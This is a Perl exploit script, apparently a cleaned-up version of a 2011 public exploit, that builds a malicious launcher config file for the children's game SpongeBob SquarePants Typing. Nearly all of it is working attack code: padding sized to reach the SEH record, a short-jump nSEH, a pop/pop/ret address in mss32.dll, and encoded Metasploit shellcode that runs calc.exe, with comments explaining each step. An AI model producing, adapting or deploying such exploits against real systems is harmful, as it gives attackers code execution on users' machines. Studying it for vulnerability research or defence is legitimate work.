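#!/usr/bin/perl
# SEH overwrite exploit for SpongeBob SquarePants Typing
# from The Learning Company (http://goo.gl/1EHaD)
# Date: May 4th 2011
# Author: Infant Overflow
#
# Fresh out the womb laying the smack down on SpongeBob
# I like my sploits like I like my milk... fresh
#
# Shoutz to Pops, Elmo, my girl Dora, Handy M, and Thomas the Mother f'n Train
#
# Tested on WinXP SP3
#
# What this script does: it writes a salstartup.xml (the launcher's
# config record) whose first quoted field is oversized.  The field is
# laid out as
#
#   [padding 1024][nSEH: jmp short +6][SEH: pop/pop/ret][shellcode][filler]
#
# When the launcher overruns a stack buffer while parsing that field it
# overwrites an exception registration record.  On the resulting
# exception the pop/pop/ret handler returns into the nSEH slot, whose
# short jump hops over the 4-byte handler address and lands on the
# shellcode.  The payload is the Metasploit windows/exec stub that
# launches calc.exe (see the generator banner below).
#
# Review notes:
#  - the 1024-byte offset and the handler address 0x2110234D inside
#    mss32.dll are the author's values for the tested build (WinXP SP3
#    per the header); both need re-checking against any other version
#    of the game or its bundled DLLs.
#  - the handler address is only usable because, per the author's note,
#    mss32.dll was built without /SAFESEH.  A rebuilt DLL with a SafeSEH
#    table would make the dispatcher reject it.
#  - the original script used a bareword two-arg open() with no error
#    check, no binmode() and no close().  It now opens in binary mode,
#    checks every I/O call, and accepts an optional output path as the
#    first command-line argument (default unchanged).
use strict;
use warnings;

# Output path: defaults to salstartup.xml in the current directory.
# The three-argument open below means the argument is only ever a path,
# never a mode or pipe spec.
my $outfile = @ARGV ? $ARGV[0] : 'salstartup.xml';

# Distance from the start of the oversized field to the SEH record
# (author's value for the tested build).
my $padding = "A" x 1024;

# nSEH: "jmp short +6" followed by two NOPs.  Execution arrives here via
# the pop/pop/ret below; the jump skips the 4-byte handler address that
# follows in memory and lands on the first shellcode byte.
my $nseh = "\xeb\x06\x90\x90";

# SEH handler: pop/pop/ret in mss32.dll, packed little-endian.  The
# author reports the module has no SafeSEH table, which is what makes
# an address inside it acceptable to the exception dispatcher.
my $seh = pack('V', 0x2110234D);

# windows/exec - 247 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=c:\windows\system32\calc.exe
my $shellcode =
    "\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9" .
    "\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef" .
    "\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f" .
    "\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5" .
    "\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea" .
    "\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda" .
    "\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7" .
    "\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe" .
    "\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d" .
    "\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec" .
    "\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6" .
    "\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0" .
    "\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4" .
    "\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a" .
    "\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88" .
    "\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a" .
    "\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b" .
    "\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33";

# Guard against a mangled copy/paste of the stub: the msfpayload banner
# says 247 bytes, and a truncated or duplicated line here would silently
# shift nothing but still produce a broken payload.
die "shellcode is " . length($shellcode) . " bytes, expected 247\n"
    unless length($shellcode) == 247;

# Trailing filler after the shellcode.  The author's crash case used
# 1000 NOPs here; presumably it keeps the overall field length the same
# as the original test, so it is kept verbatim.  It is not a landing
# sled - execution enters at the first shellcode byte via nSEH.
my $filler = "\x90" x 1000;

# Bytes that precede the payload in the config record: a space and the
# opening double quote of the field being overflowed.
my $prefix = ' "';

# The remainder of the launcher's config after the overflowed field,
# reproduced verbatim from the original script.  As shown in the
# original listing the straight apostrophe in "User's Guide.pdf" would
# terminate a single-quoted Perl literal, so it is escaped here; the
# resulting bytes are unchanged.
my $suffix = '" "SpongeBob SquarePants Typing" 7-10 1000 "E:\INSTALL\ACROBAT\Ver50\Acrobat Reader 5 Installer.exe" yes 4To6 default E:\TLC\383167-CD "SpongeBob SquarePants Typing" salstartup.rsc all scene 9100 all toon 0 0 9100 1 all fob play disk1 "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\SPT.exe" wait 461 60 9124 all fob extension "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\User\'s Guide.pdf" wait 543 158 9126 all fob uninstall C:\WINDOWS\TLCUninstall.exe -l "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\Uninstall.xml" exit 514 373 9125 all fob link http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher wait 538 263 375 9130 all fob install "C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\ereg\ereg32.exe" wait 522 324 9129 all fob link disk1 startup:startup/BrandingPage wait 543 207 9128 all toon 5000 all fob install disk1 E:\SailorificStuff\sbscreen_setup.exe wait 546 188 5054 all fob link startup:startup/screen 537 263 5055 yes pentium 266 warn "266 MHz Pentium or faster is recommended." no yes yes no yes yes warn "You operating system is not supported. Play at your own risk!" 100 ignore "There is not enough hard disk space available to play!" 64 warn "There is not enough RAM available to play!" 64 warn You are low on memory! 800 600 16 fail "Your display is not capable of 800 x 600 16-bit, thousands of colors." fail "WAVE driver is not available." ppc 233 warn "233 MHz Powerpc or faster is recommended." 0860 fail "You must run System 8.6 or above!" 1004 fail "You must run OSX 10.04 or above!" 100 ignore "There is not enough hard disk space available to play!" 64 warn "There is not enough RAM available to play!" 0 warn 16 warn "Your display is not capable of 16-bit, thousands of colors." 
ignore ignore ';

# Assemble the record in the same order as the original script.
my $payload = join '', $prefix, $padding, $nseh, $seh, $shellcode, $filler, $suffix;

open my $fh, '>', $outfile
    or die "cannot open $outfile for writing: $!\n";
# Raw bytes only: a text-mode layer on Windows would rewrite any 0x0A in
# the payload as 0x0D 0x0A and shift every offset after it.  The current
# stub appears not to contain 0x0A, but a re-encoded one easily could.
binmode $fh;
print {$fh} $payload
    or die "write to $outfile failed: $!\n";
# Buffered write errors surface at close, so it is checked too.
close $fh
    or die "close of $outfile failed: $!\n";
print "wrote ", length($payload), " bytes to $outfile\n";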